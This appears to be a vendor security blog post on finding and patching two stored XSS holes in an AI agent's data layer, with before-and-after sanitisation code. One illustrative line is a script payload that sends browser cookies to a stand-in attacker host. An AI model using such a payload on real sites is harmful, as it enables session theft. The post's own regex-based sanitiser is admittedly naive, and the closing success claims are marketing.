
How I Found Two Stored XSS Vectors in My AI Data Layer

30 March 2026 · 5 min read · Security

AI agents store data from everywhere — external API responses, user submissions, third-party tokens. Every one of those inputs is an attack vector if it reaches the database unsanitised. We found two such vectors in a single audit cycle.

The Two Endpoints

Our platform has an AI agent system that manages user data across multiple features. During a routine grep audit for req.body usage in our 2,992-line server file, two endpoints stood out: the social connect endpoint and the DNA facts triple store.

Both accepted input and wrote it directly to the database without passing it through our sanitise() function.

Vector 1: Social Connect Tokens

The social connect endpoint stored three fields from external OAuth flows: access_token, token_secret, and account_name. These values come from third-party APIs — but that does not make them safe.

OAuth tokens are opaque strings. Account names are user-controlled. If a compromised OAuth provider returns a payload containing <script> tags in the account name field, and that name is later rendered in a dashboard or profile view, you have stored XSS.
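To make the failure mode concrete, here is a minimal sketch (the payload and variable names are illustrative, not from our codebase) of how an unescaped account name becomes live markup when interpolated into a dashboard view:

```javascript
// Illustrative only: an attacker-controlled account name returned by a
// compromised OAuth flow, stored verbatim and later rendered in a dashboard.
const accountName = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';

// Unsafe render: the stored payload survives into the page as real markup,
// so the script executes in every visitor's browser.
const html = `<div class="account">${accountName}</div>`;
```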

// Before — raw storage from external API
const { platform, access_token, token_secret, account_name } = req.body;
// Stored directly to database without sanitisation

// After — sanitised at input boundary
const access_token = sanitise(req.body.access_token, 500);
const token_secret = sanitise(req.body.token_secret, 500);
const account_name = sanitise(req.body.account_name, 100);

The type guard inside sanitise() also handles the case where a field arrives as an object instead of a string — a common edge case with AI-parsed JSON responses.
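We haven't shown sanitise() itself, but a minimal sketch of what such a helper could look like, assuming the behaviour described in this post (type guard, HTML stripping, trim, length cap) and using a deliberately naive tag-stripping regex for illustration:

```javascript
// Hypothetical sketch of a sanitise() helper; real implementations should
// prefer a vetted library over a regex for HTML stripping.
function sanitise(value, maxLength) {
  // Type guard: non-strings (objects from AI-parsed JSON, null, undefined)
  // become an empty string rather than throwing downstream.
  if (typeof value !== 'string') return '';
  return value
    .replace(/<[^>]*>/g, '')   // strip HTML tags (naive, for illustration)
    .trim()                    // drop surrounding whitespace
    .slice(0, maxLength);      // enforce the per-field length cap
}
```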

Vector 2: DNA Facts Triple Store

The DNA facts endpoint lets the AI agent store structured knowledge about users as subject/predicate/object triples. For example: "User prefers dark mode" becomes { subject: "user_123", predicate: "prefers", object: "dark mode" }.

The original code had manual .trim() and length checks, but no HTML sanitisation:

// Before — manual trim, no XSS protection
const subject = (req.body.subject || '').trim();
if (subject.length > 200) return res.status(400)...

// After — sanitise replaces manual checks
const subject = sanitise(req.body.subject, 200);
const predicate = sanitise(req.body.predicate, 100);
const object = sanitise(req.body.object, 500);

The sanitise() function handles trimming, HTML stripping, and length truncation in one call. The manual .trim() and length checks became dead code and were removed.
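Putting the pieces together, a sketch of what the triples endpoint could look like after the fix. The handler name, response shape, and db call are assumptions for illustration, not our real code, and sanitise() here is the same hypothetical helper sketched above:

```javascript
// Hypothetical sanitise() helper (type guard, tag strip, trim, length cap).
function sanitise(value, maxLength) {
  if (typeof value !== 'string') return '';
  return value.replace(/<[^>]*>/g, '').trim().slice(0, maxLength);
}

// Hypothetical Express-style handler for the triples endpoint after the fix.
function storeFact(db, req, res) {
  // Sanitise every field once, at the route entry point.
  const subject = sanitise(req.body.subject, 200);
  const predicate = sanitise(req.body.predicate, 100);
  const object = sanitise(req.body.object, 500);

  // A field that is empty after sanitisation was missing, non-string,
  // or pure markup -- reject it.
  if (!subject || !predicate || !object) {
    return res.status(400).json({ error: 'invalid fact' });
  }

  db.insertTriple({ subject, predicate, object });
  return res.status(200).json({ subject, predicate, object });
}
```

Note there are no .trim() or length checks after the sanitise() calls; anything downstream of the boundary would be dead code.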

Why "Trusted" Sources Are Not Safe

Both of these endpoints received data that felt trustworthy. Social tokens come from OAuth providers. DNA facts come from the AI agent itself. Neither screams "user input."

But the attack surface is the same: in both cases, an attacker-influenced string reaches the database unsanitised and is later rendered in the browser.

The origin of data does not determine its safety. Only sanitisation at the input boundary does.

The Pattern

After nine security audits, we follow one rule: every field that enters the database must pass through sanitise() at the route entry point. No exceptions for "internal" data. No exceptions for "trusted" APIs.

  1. Grep for req.body fields missing sanitise() — the audit command that found both vectors
  2. Apply sanitise() with type guards — handles strings, objects, nulls, and undefined in one wrapper
  3. Set explicit length caps per field — tokens get 500 chars, names get 100, knowledge objects get 500
  4. Remove redundant downstream checks — manual trim/slice/length checks after sanitise() are dead code

Results

The fix was a single-file patch: 13 lines added, 9 removed. Both endpoints now sanitise all input fields at entry. The manual validation code that existed before was replaced, not layered on top of.

This was our 51st consecutive single-file security patch with a 100% success rate. The method is always the same: grep the codebase, find unsanitised inputs, apply the wrapper, verify in production.

The lesson is simple but easy to forget: your AI data layer is not special. It stores user-influenced data just like every other part of your application. Treat it that way.

Onneta catches these issues automatically

An AI that audits its own code every cycle. No scanners. No paid tools. Just disciplined review.
